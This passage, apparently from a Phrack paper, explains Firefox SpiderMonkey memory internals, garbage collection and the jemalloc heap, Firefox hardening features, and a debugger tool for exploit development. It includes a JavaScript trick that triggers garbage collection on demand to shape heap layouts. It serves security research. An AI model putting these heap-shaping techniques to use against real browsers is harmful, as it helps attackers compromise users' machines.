enough to present all the necessary background details or the full
technical depth of an exploitation subject. Therefore, I was quite happy
when the Phrack Staff approached me for writing a paper based on my
conference talk.

My goal for this paper is to define a reusable exploitation methodology
against the latest versions of the Mozilla Firefox browser in the context
of the modern protections provided by most operating systems. The term
'exploitation' here refers to leveraging memory corruption
vulnerabilities (of different types, i.e, buffer overflows, use-after-
frees, type confusions). By 'reusable methodology' I mean an attack
pattern that can be applied towards the exploitation of most
vulnerabilities and vulnerability classes. Although the material in this
paper are from the Windows version of Firefox, to the best of my
knowledge the included techniques can be used on all platforms supported
by Firefox.

Specifically, for all techniques and included code excerpts I have used
the latest version of Firefox (41.0.1 at the time of writing) on Windows
8.1 x86-64. Please note that Firefox stable on Windows (even on a x86-64
system) is x86.

--[ 2 - Firefox and SpiderMonkey internals

I will start by explaining some Firefox and SpiderMonkey internals that
are required for the exploitation methodology. SpiderMonkey (Firefox's
JavaScript engine) uses C++ variables of type JS::Value (or simply jsval)
to represent strings, numbers (both integers and doubles), objects (
including arrays and functions), booleans, and the special values null
and undefined [JSV]. When in JavaScript (JS) a string for example is
assigned to a variable or an object's attribute, the runtime must be able
to query its type. Therefore, jsvals must follow a representation that
encodes both values and types. SpiderMonkey uses the 64-bit IEEE-754
encoding [IFP] for this purpose. Specifically, jsval doubles use the full
64 bits for their value. All other jsvals (integers, strings, etc) are
encoded with 32 bits for a tag specifying their type and 32 bits for
their value. In Firefox's source code we can find the constants for the
jsval types at js/public/Value.h:

#define JSVAL_TYPE_DOUBLE    ((uint8_t)0x00)
#define JSVAL_TYPE_INT32     ((uint8_t)0x01)
#define JSVAL_TYPE_UNDEFINED ((uint8_t)0x02)
#define JSVAL_TYPE_BOOLEAN   ((uint8_t)0x03)
#define JSVAL_TYPE_MAGIC     ((uint8_t)0x04)
#define JSVAL_TYPE_STRING    ((uint8_t)0x05)
#define JSVAL_TYPE_SYMBOL    ((uint8_t)0x06)
#define JSVAL_TYPE_NULL      ((uint8_t)0x07)
#define JSVAL_TYPE_OBJECT    ((uint8_t)0x08)

These constants are then used to get the 32-bit jsval tags for the
different types:

#define JSVAL_TAG_CLEAR ((uint32_t)(0xFFFFFF80))
#define JSVAL_TAG_INT32 ((uint32_t)(JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32))
#define JSVAL_TAG_UNDEFINED ((uint32_t)(JSVAL_TAG_CLEAR | \
                              JSVAL_TYPE_UNDEFINED))
#define JSVAL_TAG_STRING ((uint32_t)(JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING))
#define JSVAL_TAG_SYMBOL ((uint32_t)(JSVAL_TAG_CLEAR | JSVAL_TYPE_SYMBOL))
#define JSVAL_TAG_BOOLEAN ((uint32_t)(JSVAL_TAG_CLEAR | \
                              JSVAL_TYPE_BOOLEAN))
#define JSVAL_TAG_MAGIC ((uint32_t)(JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC))
#define JSVAL_TAG_NULL ((uint32_t)(JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL))
#define JSVAL_TAG_OBJECT ((uint32_t)(JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT))

When the SpiderMonkey runtime queries a jsval for its type, if its 32-bit
tag value is greater than 0xFFFFFF80 (the JSVAL_TAG_CLEAR define from
above) then the 64 bits are interpreted as a jsval of the corresponding
type. If the tag value is less or equal to 0xFFFFFF80 then the 64 bits
are interpreted as an IEEE-754 double. An important note at this point
that I will refer to later on is that there is no IEEE-754 64-bit double
that corresponds to a 32-bit encoded value greater than 0xFFF00000.

Apart from jsvals, SpiderMonkey also uses complex objects of type JSObject
[JSO] to represent various JavaScript objects (jsobjects). In essence
these are mappings from names (object properties) to values. To avoid
expensive dictionary lookups from these properties to their corresponding
values (which are stored in an array of the jsobject) SpiderMonkey uses
what is called a shape. Shapes are structural descriptions that point
directly from property names to the array indexes that hold their values.

The JSObject class uses the NativeObject class for its internal
implementation (to be precise the NativeObject class inherits from the
JSObject class). These complex objects also contain an inline dynamically-
sized (but up to a limit) array that is used to store named properties,
and elements of JavaScript arrays and typed arrays. The first (named
properties) are indexed by the slots_ pointer, and the latter (array
elements) by the elements_ pointer. The actual storage can be either the
inline jsobject storage or a dynamically allocated region on the heap.

Moreover, jsobject arrays have a header; this header is described by the
ObjectElements class. The definition of the JSObject class can be found at
js/src/jsobj.h, and those of NativeObject and ObjectElements at
js/src/vm/NativeObject.h. Below I will discuss all of them together
(think of it as pseudocode) and only their relevant to the paper fields:

    class NativeObject : public JSObject
    {
        /*
         * From JSObject; structural description to avoid dictionary
         * lookups from property names to slots_ array indexes.
         */
        js::HeapPtrShape shape_;

        /*
         * From JSObject; the jsobject's type (unrelated to the jsval
         * type I described above).
         */
        js::HeapPtrTypeObject type_;

        /*
         * From NativeObject; pointer to the jsobject's properties'
         * storage.
         */
        js::HeapSlot *slots_;

        /*
         * From NativeObject; pointer to the jsobject's elements' storage.
         * This is used by JavaScript arrays and typed arrays. The
         * elements of JavaScript arrays are jsvals as I described them
         * above.
         */
        js::HeapSlot *elements_;

        /*
         * From ObjectElements; how are data written to elements_ and
         * other metadata.
         */
        uint32_t flags;

        /*
         * From ObjectElements; number of initialized elements, less or
         * equal to the capacity (see below) for non-array jsobjects, and
         * less or equal to the length (see below) for array jsobjects.
         */
        uint32_t initializedLength;

        /*
         * From ObjectElements; number of allocated slots (for object
         * properties).
         */
        uint32_t capacity;

        /*
         * From ObjectElements; the length of array jsobjects.
         */
        uint32_t length;
    };

In the following sections of this paper I am going to refer back to this
as 'jsobject' (or the 'jsobject class'), which although isn't technically
correct (as I have explained above) will make the discussion simpler.

----[ 2.1 - Representation in memory

In order to get a better insight, let's look at the representation of
jsvals and jsobjects in memory. We have the following JavaScript code:

    var arr = new Array();          // an array jsobject (ArrayObject)

    arr[0]  = 0x40414140;           // [A] an integer
    arr[1]  = "Hello, Firefox!";    // [B] a string
    arr[2]  = 0x42434342;
    arr[3]  = true;                 // [C] a boolean
    arr[4]  = 0x44454544;
    arr[5]  = new Array(666);       // [D] an object

    // add some elements to the array
    arr[5][0] = 666;
    arr[5][1] = "sixsixsix";
    arr[5][2] = 0.666;
    arr[5][3] = false;
    arr[5][4] = new Array(666);

    arr[6]  = 0x46474746;
    arr[7]  = null;
    arr[8]  = 0x48494948;

    // [E] a typed array jsobject holding unsigned 32-bit integers
    arr[9]  = new Uint32Array(128);

    // let's fill the typed array with some content
    // total size: 128 * 4 == 512
    for(var j = 0; j < 128; j += 2)
    {
        arr[9][j]     = 0x61636361;
        arr[9][j + 1] = 0x71737371;
    }

    arr[10] = 0x50515150;
    arr[11] = 1.41424344;           // [F] a double
    arr[12] = 0x52535352;

    // [G] and a bigger string
    arr[13] = "Hello, Firefox, and hello again";

In WinDbg we search for our first integer marker value, that is 40414140,
and then we inspect the elements of the array we have defined:

    0:000> s -d 0 0x0 l?0xffffffff 40414140
    09e10980  40414140 ffffff81 0f352880 ffffff85  @AA@.....(5.....
    09e10a00  40414140 ffffff81 0f352880 ffffff85  @AA@.....(5.....

The reason of finding our marker value twice will become clear below. Now
let's do a memory dump from a few dwords before the found value; I am
going to annotate the dump from WinDbg to make the discussion easier to
follow:

    0:000> dd 09e10980-20 l?48

    [ Our arr ArrayObject ]
              shape_   type_    slots    elements
    09e10960  0eed89a0 0f3709b8 00000000 09e10a00

    [ Metadata of the old elements,
      the default length of ArrayObjects is 6 ]
              flags    initlen  capacity length
    09e10970  00000000 00000006 00000006 00000006

    [ Old elements' address ]
    09e10980  40414140 ffffff81 0f352880 ffffff85
    09e10990  42434342 ffffff81 00000001 ffffff83
    09e109a0  44454544 ffffff81 09e109b0 ffffff88
    09e109b0  0eed89a0 0f3709e8 00000000 0c94e010
    09e109c0  00000000 00000000 00000000 0000029a
    09e109d0  0eed89a0 0f370a30 00000000 0d177010
    09e109e0  00000000 00000000 00000000 0000029a

    [ Metadata of relocated elements,
      the length of our new ArrayObject is 0xe, or 14 in decimal ]
              flags    initlen  capacity length
    09e109f0  00000000 0000000e 0000000e 0000000e

    [ New elements' address ]
              int32 jsval [A]   string jsval [B]
    09e10a00  40414140 ffffff81 0f352880 ffffff85

                                bool jsval [C]
    09e10a10  42434342 ffffff81 00000001 ffffff83

                                object jsval (ArrayObject) [D]
    09e10a20  44454544 ffffff81 09e109b0 ffffff88

    09e10a30  46474746 ffffff81 00000000 ffffff87

                                object jsval (typed array) [E]
    09e10a40  48494948 ffffff81 12634520 ffffff88

                                double jsval [F]
    09e10a50  50515150 ffffff81 bab61ee0 3ff6a0bd

                                string jsval [G]
    09e10a60  52535352 ffffff81 0eef9730 ffffff85

At the start of the memory dump (at 09e10960) we can see the metadata of
our arr ArrayObject; the shape_, type_, slots and elements pointers. The
slots pointer is NULL since our jsobject has no named properties. The
elements pointer points to the jsval contents of the array at 09e10a00.
These are actually the relocated contents of the array. At address
09e10970 we can see the original metadata of the elements (the default
length of an array when not specified is always 6), and at 09e10980 the
original contents. The elements (along with their metadata) were
relocated while we were adding contents to the arr array.

The elements pointer after the relocation points to 09e10a00 where the
jsval contents begin. Four dwords before that, at 09e109f0, we have their
metadata; flags, initializedLength (or initlen), capacity, and length. As
expected, initlen, capacity, and length are all 0xe.

At 09e10a00 there is our integer marker value 40414140 and at 09e10a04 its
32-bit tag of ffffff81 denoting as an integer jsval [A]. At 09e10a08 we
can see the string jsval for [B]. Based on a) whether the underlying
platform is x86 or x86-64, b) the length of the jsval string, and c)
whether it is plain ASCII or unicode, the content bytes of the string are
either inline or not. On x86 the maximum length for an inline ASCII
string is 7 and 3 for unicode; on x86-64 it is 15 for ASCII and 7 for
unicode. Our [B] string has length 15 (0xf) therefore it is inlined.
Let's see the contents of the address that the [B] string jsval points to:

    0:000> dd 0f352880
              flags    length   string's contents
    0f352880  0000005d 0000000f 6c6c6548 46202c6f

    0f352890  66657269 0021786f 00737365 00000004

    0:000> db 0f352880
    0f352880  5d 00 00 00 0f 00 00 00-48 65 6c 6c 6f 2c 20 46  ]..Hello, F
    0f352890  69 72 65 66 6f 78 21 00-65 73 73 00 04 00 00 00  irefox!.ess

At 0f352880 it's the start of the metadata of our inline [B] string; the
flags (0x5d), the length (0xf == 15 in decimal) and then at 0f352888 the
ASCII contents of [B].

In contrast, the string jsval at 09e10a68 [G] is not inline. Again, the
tag value of [G] is ffffff85 denoting as a string, and it's value points
to 0eef9730:

    0:000> dd 0eef9730
              flags    length   pointer to string's contents
    0eef9730  00000049 0000001f 0bcba840 00000000

    0:000> dd 0bcba840
    0bcba840  6c6c6548 46202c6f 66657269 202c786f
    0bcba850  20646e61 6c6c6568 6761206f 006e6961

    0:000> db 0bcba840

    0bcba840 \
    48 65 6c 6c 6f 2c 20 46-69 72 65 66 6f 78 2c 20  Hello, Firefox,

    0bcba850 \
    61 6e 64 20 68 65 6c 6c-6f 20 61 67 61 69 6e 00  and hello again.

At 0eef9730 we have the flags (0x49), length (0x1f == 31 in decimal), and
at 0eef9738 a pointer to the actual bytes contents of the string (at
0bcba840). Actually SpiderMonkey strings are a lot more interesting and
useful, so I refer the interested reader to js/src/vm/String.h. However,
for the purposes of this paper the above details are adequate.

At 09e10a28 there is the [D] ArrayObject we have instantiated with a
capacity of 666 (or 0x29a in hex); its tag is ffffff88 denoting it as an
object, and its value is the address 09e109b0, where we can see the
ArrayObject metadata as we have talked about them before:

    0:000> dd 09e109b0
              shape_   type_    slots    elements
    09e109b0  0eed89a0 0f3709e8 00000000 0c94e010

              flags    initlen  capacity length
    09e109c0  00000000 00000000 00000000 0000029a

    0:000> dd 0c94e010-10
              flags    initlen  capacity length
    0c94e000  00000000 00000005 0000029a 0000029a

              arr[5][0] = 666;  arr[5][1] = "sixsixsix";
    0c94e010  0000029a ffffff81 0eed78a0 ffffff85

    0c94e020  3b645a1d 3fe54fdf 00000000 ffffff83
    0c94e030  09e109d0 ffffff88 5a5a5a5a 5a5a5a5a

The elements pointer of the [D] ArrayObject points to 0c94e010 where we
can see the first element of this array, i.e. arr[5][0], namely the
integer jsval 0x29a (or 666 in decimal). At 0c94e000 there are the
metadata associated with these elements.

Here we can clearly see the difference between the initializedLength, the
capacity, and the length of an ArrayObject. The initializedLength and the
capacity from the metadata at 09e109b0 are both zero, while it's length is
0x29a; this is the case since at [D] we simply declared an ArrayObject
with a length of 0x29a without actually adding any elements to it. Then
we added five elements (arr[5][0] to arr[5][4]), and the new
initializedLength became 5, while the capacity became equal to length,
i.e. 0x29a (all these from the metadata at 0c94e000).

Before we move on, let's also look at SpiderMonkey typed arrays since we
will use them in our attack methodology later on. Typed arrays are a very
useful JavaScript feature since they allow us to situate on the heap
arbitrary sized constructs of controlled content (to arbitrary byte
granularity). Previous Firefox attacks, like [P2O] and [REN], relied on
the fact that SpiderMonkey used to situate the actual content (data) and
the corresponding metadata of typed arrays contiguously in memory.
Unfortunately this is no longer the case; the GC tenured heap and the
jemalloc heap (both of which I will explain shortly) keep these
separated, even when we try to force such a layout. However, typed arrays
remain very useful.

At [E] we instantiate a Uint32Array object, i.e. a typed array jsobject
holding unsigned 32-bit integers, with an initial length of 128, whose
object-type jsval we can find at address 09e10a48; its value is the
address 12634520. There we see the Uint32Array object, starting with its
metadata (for example, at 12634538 its length of 0x80, or 128 in
decimal), and at 12634548 the pointer to the actual buffer contents of
the typed array (0dd73600).

    0:000> dd 12634520
    12634520  0af6c5c8 0f370e80 00000000 7475a930
    12634530  126344f0 ffffff88 00000080 ffffff81
    12634540  00000000 ffffff81 0dd73600 ffffff81
    12634550  00000000 00000000 00000000 00000000

    0:000> dd 0dd73600
    0dd73600  61636361 71737371 61636361 71737371
    0dd73610  61636361 71737371 61636361 71737371
    0dd73620  61636361 71737371 61636361 71737371
    0dd73630  61636361 71737371 61636361 71737371
    0dd73640  61636361 71737371 61636361 71737371
    0dd73650  61636361 71737371 61636361 71737371
    0dd73660  61636361 71737371 61636361 71737371
    0dd73670  61636361 71737371 61636361 71737371

As expected, the contents of the typed array at 0dd73600 are precisely
what we assigned in our code. The buffer that holds these contents is
allocated on the heap and its size is four times the number of uint32
elements we assigned to the typed array (since each element is four bytes
long). So, for our [E] typed array, its contents buffer at 0dd73600 is
512 bytes long (4 * 128 == 512).

----[ 2.2 - Generational garbage collection (GGC)

Since release 32.0 [F32] Firefox has a new garbage collection (GC)
implementation enabled by default (on all its supported operating
systems) called 'generational garbage collection' (GGC). In GGC there are
two separate heaps; a) the nursery on which most SpiderMonkey objects are
allocated, and b) the tenured or major heap which is more or less the old
(before release 32.0) normal SpiderMonkey GC heap. When the nursery
becomes full (or some other event happens) we have the so-called minor GC
pass. During this, all the temporary short-lived JavaScript objects on
the nursery are collected and the memory they were occupying becomes
again available to the nursery. On the other hand, the JavaScript objects
on the nursery that are reachable in the heap graph (i.e. alive) are
moved to the tenured heap (which also makes the memory they were
occupying available to the nursery). Once an object is moved to the
tenured heap, during a minor GC pass, it is checked for outgoing pointers
to other objects on the nursery heap. Such objects are moved from the
nursery to the tenured heap as well, since they are actually reachable.
This iterative process continues until all reachable objects
are moved from the nursery to the tenured heap, and the memory they were
occupying is set to available for the nursery. This generational (also
called 'moving') garbage collection approach has resulted in impressive
performance gains for SpiderMonkey since most JavaScript allocations are
indeed short-lived.

To make it clear how all the above fit in the context of the Firefox
browser, I should talk about JSRuntime [JSR]. An instantiated JSRuntime
object (see js/src/vm/Runtime.cpp for the class) holds all JavaScript
variables, objects, scripts, etc. SpiderMonkey as compiled for Firefox is
single-threaded by default, therefore Firefox usually has just one
JSRuntime. However, (web) workers can be launched/created and each one of
them has its own JSRuntime. Each different JSRuntime has one separate GGC
heap (nursery and tenured), and they don't share heap memory. Furthermore
they are isolated from each other; one JSRuntime cannot access objects
allocated by a different JSRuntime.

The nursery has a hardcoded size of 16 megabytes allocated with
VirtualAlloc() (or with mmap() on Linux). It operates as a standard bump
allocator; a pointer is maintained that points to the first unallocated
byte in the nursery memory area. To make an allocation of X bytes, first
there is a check if there are X bytes available in the nursery. If there
are, X is added to the pointer (the "bump") and its previous value is
returned to service the allocation request. If there aren't X bytes
available, a minor GC is triggered. During this GC pass the new object is
moved to the tenured heap, and if its slots or elements (see section 2.1)
are above a certain number they are moved to the jemalloc-managed heap.

The tenured heap (you may also see it referred to as 'major' or simply
'GC' heap in Firefox's code base) has its own metadata and algorithms to
manage memory. These are distinct from both the nursery and the jemalloc
heaps. Apart from being the heap for JavaScript objects that survived a
nursery GC pass, some allocations go directly on it bypassing the
nursery. Examples of such cases are known long-lived objects (e.g. global
objects), function objects (due to JIT requirements), and objects with
finalizers (i.e. most DOM objects). I will not go into more details for
the tenured heap since they are not relevant to the exploitation
methodology.

----[ 2.3 - jemalloc (and GGC)

In this section I will only discuss the necessary jemalloc knowledge you
require in order to follow the analysis in section 5. For a more detailed
treatise I refer you to another Phrack paper which is still applicable to
the current state of jemalloc [PSJ].

jemalloc is a bitmap allocator designed for performance and not primarily
memory utilization. One of its major design goals is to situate allocations
contiguously in memory. The latest version of jemalloc is 4.0.0 at this
time, but Firefox includes a version forked from major release 2. Firefox's
fork is called mozjemalloc in the source tree, but it doesn't include any
significant changes from jemalloc 2. It is used in Firefox for allocations
that become too big (based on some limits I will discuss shortly) for the
tenured heap. However, there are some exceptions; certain allocations
triggerable from JavaScript can bypass both the nursery and the tenured
heap and go directly to the jemalloc-managed heap. I will not discuss this
further, so you can consider it an exercise ;)

In jemalloc memory is divided into regions which are categorized according
to their size. Specifically, the size categories, called 'bins', in Firefox
are 2, 4, 8, 16, 32, 48, ..., 512, 1024, up to inclusive 2048. malloc()
requests larger than 2048 bytes are handled differently and are not in
scope for this paper. Each bin (or size category) is associated with
several 'runs'; these are the actual containers for the regions. A run can
span one or more virtual memory pages which are divided into regions of the
bin size that the run belongs to. Bins have the metadata for their runs and
through them free regions are located. The following diagram is a
simplified version of the original one from [PSJ] and summarizes the above
notes.

.--------------------------------. .--------------------------------.
|                                | |                                |
|   Run #0         Run #1        | |   Run #0         Run #1        |
| .-------------..-------------. | | .-------------..-------------. |
| |             ||             | | | |             ||             | |
| |   Page      ||   Page      | | | |   Page      ||   Page      | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | |         | || |         | | | | | |         | || |         | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^     ^ | || |         | | | | | | ^     ^ | || |         | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
      |     |                            |     |
      |     |                            |     |
  .---|-----|----------.             .---|-----|----------.
  |   |     |          |             |   |     |          |
  | free regions' list | ...         | free regions' list | ...
  |                    |             |                    |
  `--------------------'             `--------------------'
  bin of size category 8             bin of size category 16

Allocation requests (i.e. malloc() calls) are rounded up and assigned to a
bin. Then, through the bin's free regions' metadata, a run with a free
region is located. If none is found, a new run is allocated and assigned
to the specific bin. Therefore, this means that objects of different types
but with similar sizes that are rounded up to the same bin are contiguous
in the jemalloc heap. Another interesting feature of jemalloc is that it
operates in a last-in-first-out (LIFO) manner (see [PSJ] for the free
algorithm); a free followed by a garbage collection and a subsequent
allocation request for the same size, most likely ends up in the freed
region.

At this point let's utilize an example to see how the jemalloc heap is
used in Firefox along with the GGC heaps, namely nursery and tenured. In
the diagram below the nursery heap is nearly full and we have an
allocation request for a JSObject with an N number of slots.

...........................................................................
 +-+            +-++-------+           +-------+        :
 |T| Temporary  |J|| slots | Survivor  |       | Free   :        jemalloc
 | | object     | ||   N   | JSObject  |       | memory :     +-----------+
 +-+            +-++-------+  + slots  +-------+        :     | +-------+ |
....................................................... :     | | slots | |
                                                        :     | |   N   | |
                                        Before minor GC :     | +-------+ |
                          JSObject      --------------- :     |    ^  ^   |
                          allocation                    :     |    |  |   |
                          request   +-++-------+        :     |    |  |   |
Nursery doesn't have                |J|| slots |        :     |    |  |   |
free memory for         +----------+| ||   N   |+------------------+  |   |
JSObject + its slots    |           +-++-------+        :     |       |   |
      +---------------+ |                               :     |       |   |
                      | |                               :     |       |   |
                      v v                               :     |       |   |
 +-----------------------+   +-----------------------+  :     |       |   |
 |+-++-++-++-++-++-++-++-+   |+-++-+                 |  :     |       |   |
 ||T||T||T||T||T||T||T||J|   ||J||J|                 |  :     |       |   |
 || || || || || || || || |   || || |                 |  :     |       |   |
 |+-++-++-++-++-++-++-++-+   |+-++-+                 |  :     |       |   |
 +-----------------------+   +-----------------------+  :     |       |   |
  Nursery               +     Tenured                   :     |       |   |
                        |                               :     |       |   |
                        |                               :     |       |   |
                        +------------+                  :     |       |   |
                                     |                  :     |       |   |
.....................................|................. :     |       |   |
                                     |                  :     |       |   |
  First unallocated nursery byte     |  After minor GC  :     |       |   |
  +-----+                            |  --------------  :     +-------|---+
  |                                  |                  :             |
  v                                  v                  :             |
 +-----------------------+   +-----------------------+  :             |
 |                       |   |+-++-++-+              |  :             |
 |                       |   ||J||J||J|+------------------------------+
 |                       |   || || || |              |  :  slots_ pointer
 |                       |   |+-++-++-+              |  :
 +-----------------------+   +-----------------------+  :
  Nursery                     Tenured                   :
...........................................................................

The JSObject itself can fit (or not, doesn't affect the rest of the
events) in the free space of the nursery, but its slots cannot. So, the
JSObject is placed on the nursery and since it becomes full, a minor GC is
triggered. If it couldn't fit in the nursery a minor GC would also be
triggered. During this GC and assuming that the JSObject is a survivor
object, i.e. not a temporary one, it is moved from the nursery to the
tenured heap (or placed directly there if it couldn't fit in the nursery
in the first place). If the number of its slots N is greater than a
certain number (more on this later), they are not placed on the tenured
heap with the object itself. Instead, a new allocation for the size of the
N slots is made on the jemalloc heap, and the slots are placed there. Then
the slots_ pointer of the jsobject stores the address of the jemalloc heap
region that contains the slots.

--[ 3 - Firefox's hardening features

Firefox has some security hardening features that are useful to know if you
are doing or plan to do any exploit development for it. I will try to list
them all here to give you the references to start digging from, but I will
only expand on those that affect our goal for this paper.

----[ 3.1 - PresArena

PresArena is Gecko's specialized heap for CSS box objects (Gecko is
Firefox's layout engine). When a CSS box object is freed, the free
PresArena heap 'slot' is added to a free list based on its type. This means
that PresArena maintains separate free heap 'slot' lists for each different
CSS box object type. An allocation request is serviced from the free list
of the type of objects it is trying to allocate. This basically means that
for CSS box objects PresArena implements type-safe memory reuse, mostly
killing use-after-free exploitation. I say 'mostly' because in some cases a
use-after-free bug can still be exploitable via same-object-type trickery,
like playing with attributes' values for example.

PresArena also services types of objects that related to CSS box objects
but are not. The free lists of these objects are per size and not per type.
This of course means that use-after-free bugs for these object types are
exploitable as usual.

The code for PresArena is at layout/base/nsPresArena.{h, cpp}.

----[ 3.2 - jemalloc heap sanitization

Since jemalloc rounds up allocation requests to the closest size category
(bin), it is possible that a small object may be assigned to the same
region that a bigger object was occupying before being freed (both objects
smaller or equal to the size category of course). Therefore, in such a case
we could use the small object to read back memory left by the bigger
object. This could reveal DLL pointers and could help in bypassing ASLR. To
avoid this jemalloc sanitizes regions after they are freed. Current Firefox
versions use the value e5e5e5e5 to sanitize; older versions used a5a5a5a5.
This hardening feature also makes some uninitialized memory bugs
unexploitable. In any case, if you're fuzzing Firefox these are nice values
to look for in crash logs.

----[ 3.3 - Garbage collection

Being able to trigger a garbage collection on demand is fundamental when
trying to create specific object layouts on the heap. Firefox provides no
unprivileged JavaScript API to do this. Although not having an on-demand
GC API call is not listed as a hardening feature, it is clear that Firefox
developers actively try to remove direct execution paths from unprivileged
JavaScript functions to GC. A GC can be triggered for a variety of reasons;
Firefox has these divided into two major categories, those related to the
JavaScript engine and those that aren't. The second category includes
reasons related to the layout engine (for example frame refreshing), as
well as ones more general to the browser (for example when the main process
exits). You can find the names of all the reasons at js/public/GCAPI.h.
These are the start for finding ways to trigger a GC on demand from
unprivileged JavaScript code.

A simple one to get you started is TOO_MUCH_MALLOC. If you search for this
in Firefox's code and backtrace it with your favorite code reading tool,
you will conclude to the following execution path:

    dom::CanvasRenderingContext2D::EnsureTarget()
     +
     |     
     +--> JS_updateMallocCounter()
           +
           |
           +--> GCRuntime::updateMallocCounter()
                 +
                 |
                 +--> GCRuntime::onTooMuchMalloc()
                       +
                       |
                       +--> triggerGC(JS::gcreason::TOO_MUCH_MALLOC)

After reading dom::CanvasRenderingContext2D::EnsureTarget(), which is in
the file dom/canvas/CanvasRenderingContext2D.cpp, we can easily figure out
how to reach it:

    var my_canvas = document.createElement("canvas");
    my_canvas.id = "my_canvas";
    my_canvas.width = "100";
    my_canvas.height = "115";

    document.body.appendChild(my_canvas);

    for(var i = 0; i < 10; i++)
    {
        var my_context = my_canvas.getContext("2d");
        my_canvas.width = 36666;
        my_context.fillRect(21, 11, 66, 60);
    }

You can find many others; some more reliable, some less, just read the
code. Another simple one is to repeatedly create strings and append them to
a DOM node; see the archive for this example. Just keep in mind that you
may have to tweak some parameters, like the number of repetitions, the size
of strings, etc, in order to get it to work on as many as possible
different systems with different characteristics (available RAM, Firefox
versions).

----[ 3.4 - Sandbox

I will only be discussing Firefox's sandbox on Windows; the Linux and OS X
implementations are based on different technologies, seccomp and Seatbelt,
but aim to achieve similar goals. All the code is available at
security/sandbox/{win, linux, mac}.

On Windows, Firefox is using the code of the Chromium sandbox. In short,
there is a parent process (broker) that is responsible for starting
sandboxed children processes (targets). The communication between the two
is implemented via a Firefox-specific C++ IPC called IPDL (Inter-process
communication Protocol Definition Language). There are three different
sandbox policies for children processes implemented, a) for layout content,
b) for media playback, and c) for other plugins. These are implemented by
the following functions, a) SetSecurityLevelForContentProcess(),
b) SetSecurityLevelForGMPlugin(), and c) SetSecurityLevelForPluginProcess()
respectively. You can find their implementations at
security/sandbox/win/src/sandboxbroker/sandboxBroker.cpp.

Flash in Firefox is an out-of-process plugin. This means that Firefox
launches an executable called plugin-container.exe which then loads the
Flash plugin, sandboxed by Flash's own "protected mode". On Windows this
means that it is a low integrity process, has restricted access token
capabilities, is not allowed to launch new processes, etc. Firefox plans to
stop enabling Flash's protected mode and place Flash under the above
Chromium-based sandbox as well, but this is not the case currently
(41.0.1).

--[ 4 - The shadow (over Firefox) utility

I initially re-designed unmask_jemalloc [UNJ] (a GDB/Python tool we have
written with huku) with a modular design to support all three main
debuggers and platforms (WinDBG, GDB and LLDB). I renamed the tool to
shadow when I added Firefox/Windows/WinDBG-only features.

The following is an overview of the new design (read the arrows as
"imports"). The goal is to have all debugger-dependent code in the *_driver
and *_engine modules.

---------------------------------------------------------------------------

                                                        debugger-required
                                                        frontend (glue)


    +------------+     +-------------+     +-------------+
    | gdb_driver |     | lldb_driver |     | pykd_driver |
    +------------+     +-------------+     +-------------+
          ^                   ^                   ^
          |                   |                   |
----------+-------------------+-------------------+------------------------
          |                   |                   |   
          |                   +--------+          |
          +-----------------------+    |    +-----+      core logic
                                  |    |    |        (debugger-agnostic)
                                  |    |    |
                                  |    |    |
                               +-----------------+
      +------+                 |                 |
      |      |---------------> |      shadow     |<-----+
      | util |        +------> |                 |      |
      |      |        |        +-----------------+      |
      +------+        |          ^  ^     ^    ^        |
        | | |         |          |  |     |    |        |   +--------+
        | | |   +-----+----------+  |     +----+--------+---| symbol |
        | | |   |     |             |          |        |   +--------+
      +-+ | |   |  +----------+     |          |        |   +---------+
      |   | |   |  | jemalloc |     |          +--------+---| nursery |
      |   | |   |  +----------+     |                   |   +---------+
      |   | |   |   ^    ^   ^      |                   |
      |   | |   |   |    |   |      |                   |
      |   | |   |   |    |   +------+--------+          |
      |   | |   |   |    |          |        |          |
      |   | +---+---+----+----------+--------+-----+    |
      |   |     |   |    |          |        |     |    |
      |   +-----+---+----+----+     |        |     |    |
      |         |   |    |    |     |        |     |    |
------+---------+---+----+----+-----+--------+-----+----+------------------
      |         |   |    |    |     |        |     |    |
      |         |   |    |    |     |        |     |    |     debugger
      |         |   |    |    |     |        |     |    |  dependent APIs
      |         |   |    |    |     |        |     |    |
      |         |   |    |    |     |        |     |    |
      |         |   |    |    v     |        |     v    |
      |  +------------+  |  +-------------+  |  +-------------+
      +->| gdb_engine |  +--| lldb_engine |  +--| pykd_engine |
         +------------+     +-------------+     +-------------+
               ^                   ^                   ^
               |                   |                   |
           +---+         +---------+   +---------------+
           |             |             |
           |             |             |
-----------+-------------+-------------+-----------------------------------
           |             |             |
           |             |             |        debugger-provided backend
           |             |             |
           |             |             |
        +-----+      +------+      +------+
        | gdb |      | lldb |      | pykd |
        +-----+      +------+      +------+

---------------------------------------------------------------------------

shadow can help you during Firefox exploit development when you're trying
to understand the impact of your JavaScript code on the heap. The symbol
command allows you to search for SpiderMonkey and DOM classes (and
structures) of specific sizes. This is useful when you're trying to exploit
use-after-free bugs, or when you want to position interesting victim
objects to overwrite/corrupt. All the supported commands are:

    0:000> !py c:\\tmp\\shadow\\pykd_driver help

    [shadow] De Mysteriis Dom Firefox
    [shadow] v1.0b

    [shadow] jemalloc-specific commands:
    [shadow]   jechunks                : dump info on all available chunks
    [shadow]   jearenas                : dump info on jemalloc arenas
    [shadow]   jerun <address>         : dump info on a single run
    [shadow]   jeruns [-cs]            : dump info on jemalloc runs
    [shadow]                                 -c: current runs only
    [shadow]                    -s <size class>: runs for the given size
    [shadow]                                    class only
    [shadow]   jebins                  : dump info on jemalloc bins
    [shadow]   jeregions <size class>  : dump all current regions of the
    [shadow]                                    given size class
    [shadow]   jesearch [-cfqs] <hex>  : search the heap for the given hex
    [shadow]                                    dword
    [shadow]                                 -c: current runs only
    [shadow]                                 -q: quick search (less
    [shadow]                                    details)
    [shadow]                    -s <size class>: regions of the given size
    [shadow]                                    only
    [shadow]                                 -f: search for filled region
    [shadow]                                    holes)
    [shadow]   jeinfo <address>        : display all available details for
    [shadow]                                    an address
